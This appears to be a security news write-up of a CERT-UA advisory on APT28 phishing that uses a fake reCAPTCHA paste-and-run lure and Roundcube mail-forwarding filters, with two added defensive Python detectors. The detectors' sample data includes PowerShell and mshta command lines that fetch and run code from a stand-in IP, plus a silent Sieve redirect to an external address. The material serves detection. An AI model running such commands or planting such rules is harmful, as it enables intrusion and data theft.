The Government Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign targeting local government entities.
The campaign, attributed to the Russian military hacking unit APT28 (also tracked as Fancy Bear and UAC-0001), uses emails with the subject line "Table Replacement" and links styled to look like a Google Sheets document. Clicking the link redirects users to a page mimicking a reCAPTCHA verification, which attempts to trick them into executing a malicious PowerShell command.
The malicious page prompts users to click a checkbox labeled "I'm not a robot." Once clicked, a PowerShell command is copied to the user’s clipboard. The accompanying instructions urge recipients to open the Windows Run dialog with the "Win+R" keyboard shortcut, paste the command with "Ctrl+V," and press "Enter." This action would execute the PowerShell command, leading to the download and launch of a malicious HTA file named "browser.hta" and a PowerShell script "Browser.ps1."
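The Win+R / Ctrl+V / Enter sequence described above leaves a forensic trace: Windows Explorer records every command typed into the Run dialog under the per-user RunMRU registry key. The following script, added here as a detection example and not part of the CERT-UA advisory, parses RunMRU values (which Explorer stores as `<command>\1`, most-recent-first order given by the `MRUList` value) and flags entries that launch a script interpreter or LOLBin with download, HTA, or hidden-window indicators. The sample values, the 203.0.113.10 address, and the `browser.hta` path are constructed for the example; `read_live_runmru` is a convenience helper for running the same check on a Windows host.

```python
import re

# Constructed RunMRU contents (not real IoCs): Explorer stores each Run-dialog
# entry as "<command>\1" and keeps recency order in the MRUList value.
SAMPLE_RUNMRU = {
    "a": "notepad\\1",
    "b": "\\\\fileserver\\share\\report.xlsx\\1",
    "c": 'powershell -w hidden -c "iwr http://203.0.113.10/x -UseBasicParsing | iex"\\1',
    "d": "mshta http://203.0.113.10/browser.hta\\1",
    "MRUList": "dcba",
}

# Interpreters / LOLBins that a Run-dialog "paste this" lure typically invokes.
INTERPRETERS = re.compile(
    r'^"?(?:[a-z]:\\[^"\s]*\\)?'
    r'(powershell|pwsh|mshta|cmd|wscript|cscript|certutil|curl|bitsadmin)'
    r'(?:\.exe)?"?\b',
    re.IGNORECASE,
)

# Payload indicators; any one of them combined with an interpreter is a hit.
INDICATORS = {
    "url": re.compile(r"https?://", re.I),
    "hta_payload": re.compile(r"\.hta\b", re.I),
    "iex": re.compile(r"\biex\b|invoke-expression", re.I),
    "download": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded": re.compile(r"\s-e(?:c|nc|ncodedcommand)?\s", re.I),
}


def parse_runmru(values):
    """Return (value_name, command) pairs, most recent first, trailing '\\1' stripped."""
    order = values.get("MRUList", "")
    names = list(order) + [n for n in values if n != "MRUList" and n not in order]
    parsed = []
    for name in names:
        if name not in values:
            continue
        cmd = values[name]
        if cmd.endswith("\\1"):
            cmd = cmd[:-2]
        parsed.append((name, cmd))
    return parsed


def classify(cmd):
    """Return interpreter and matched indicators for a suspicious command, else None."""
    m = INTERPRETERS.match(cmd.strip())
    if not m:
        return None
    hits = [key for key, rx in INDICATORS.items() if rx.search(cmd)]
    if not hits:
        return None
    return {"interpreter": m.group(1).lower(), "indicators": hits}


def audit_runmru(values):
    """Flag RunMRU entries consistent with a paste-and-run (ClickFix-style) lure."""
    findings = []
    for name, cmd in parse_runmru(values):
        verdict = classify(cmd)
        if verdict:
            findings.append({"value": name, "command": cmd, **verdict})
    return findings


def read_live_runmru():
    """Read the current user's RunMRU on Windows; returns {} on other platforms."""
    try:
        import winreg
    except ImportError:
        return {}
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break
                values[name] = data
                index += 1
    except OSError:
        return {}
    return values


if __name__ == "__main__":
    source = read_live_runmru() or SAMPLE_RUNMRU
    for finding in audit_runmru(source):
        print(f"[{finding['value']}] {finding['interpreter']}: {finding['indicators']}")
        print(f"    {finding['command']}")
```

On a fleet, the same heuristic is better applied to process-creation telemetry (a script interpreter spawned by explorer.exe with a URL on its command line) and to RunMRU collected across all user hives, since the key is per-user and the entry is written only after the user actually presses Enter.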
CERT-UA warns that the primary purpose of the attack is to establish an SSH tunnel for exfiltrating authentication data and other sensitive information from browsers such as Chrome, Edge, Opera, and Firefox. The attackers then deploy the Metasploit framework for further exploitation and system control.
The incident follows a September 2024 phishing attack in which a threat actor exploited a vulnerability in the Roundcube email client (CVE-2023-43770) to harvest authentication credentials and create a filter named "SystemHealthCheck" using the "ManageSieve" plugin. This filter redirected emails from the compromised accounts to an attacker-controlled inbox.
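A server-side mail-forwarding rule like the "SystemHealthCheck" filter survives password resets and is invisible in the mail client's inbox, so auditing users' Sieve scripts for redirect actions is a worthwhile check. The script below is an added example, not tooling from CERT-UA or Roundcube: it parses a Sieve script laid out the way Roundcube's managesieve plugin writes it (a `# rule:[Name]` comment preceding each rule) and reports every `redirect` whose target domain is outside an organisation's trusted list, noting whether the rule fires unconditionally and whether it uses `:copy` (which forwards silently while leaving the original in the mailbox). The sample script, the rule names, and the `mail.example.invalid` target are constructed for the example.

```python
import re

# Constructed Sieve script in the layout written by Roundcube's managesieve
# plugin: a "# rule:[Name]" comment introduces each rule. Not a real capture.
SAMPLE_SIEVE = """\
require ["fileinto","copy"];
# rule:[Newsletters]
if header :contains "subject" "newsletter"
{
\tfileinto "Newsletters";
}
# rule:[SystemHealthCheck]
if true
{
\tredirect :copy "collector@mail.example.invalid";
}
"""

RULE_HEADER = re.compile(r"^#\s*rule:\[(.*?)\]\s*$")
REDIRECT = re.compile(r'\bredirect\b(\s+:copy)?\s+"([^"]+)"\s*;')
UNCONDITIONAL = re.compile(r"^\s*if\s+true\b", re.M)


def parse_rules(script):
    """Split a managesieve-style script into (rule_name, rule_body) pairs."""
    rules, name, body = [], None, []
    for line in script.splitlines():
        m = RULE_HEADER.match(line.strip())
        if m:
            if name is not None:
                rules.append((name, "\n".join(body)))
            name, body = m.group(1), []
        elif name is not None:
            body.append(line)
    if name is not None:
        rules.append((name, "\n".join(body)))
    return rules


def audit_redirects(script, trusted_domains):
    """Return redirect actions whose target domain is not in trusted_domains."""
    trusted = {d.lower() for d in trusted_domains}
    findings = []
    for name, body in parse_rules(script):
        for m in REDIRECT.finditer(body):
            target = m.group(2)
            domain = target.rsplit("@", 1)[-1].lower()
            if domain in trusted:
                continue
            findings.append({
                "rule": name,
                "target": target,
                # "if true" means every incoming message is forwarded
                "unconditional": UNCONDITIONAL.search(body) is not None,
                # :copy keeps the original, so the victim sees nothing missing
                "copy": m.group(1) is not None,
            })
    return findings


if __name__ == "__main__":
    for f in audit_redirects(SAMPLE_SIEVE, ["gov.example"]):
        flags = ", ".join(k for k in ("unconditional", "copy") if f[k])
        print(f"rule {f['rule']!r} forwards to {f['target']} ({flags})")
```

In practice this runs over scripts pulled from each mailbox via the ManageSieve protocol (or read from the sieve storage directory on the mail server), and any rule that forwards everything to an external address with `:copy` deserves an immediate look regardless of how innocuous its name sounds.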
Both phishing attacks have been linked to a compromised command-and-control (C2) server, which was identified during investigations. CERT-UA discovered that this server facilitated access to over ten compromised government email accounts. Attackers used these accounts to automate data exfiltration and distribute phishing emails, including those containing exploits, targeting defense organizations globally.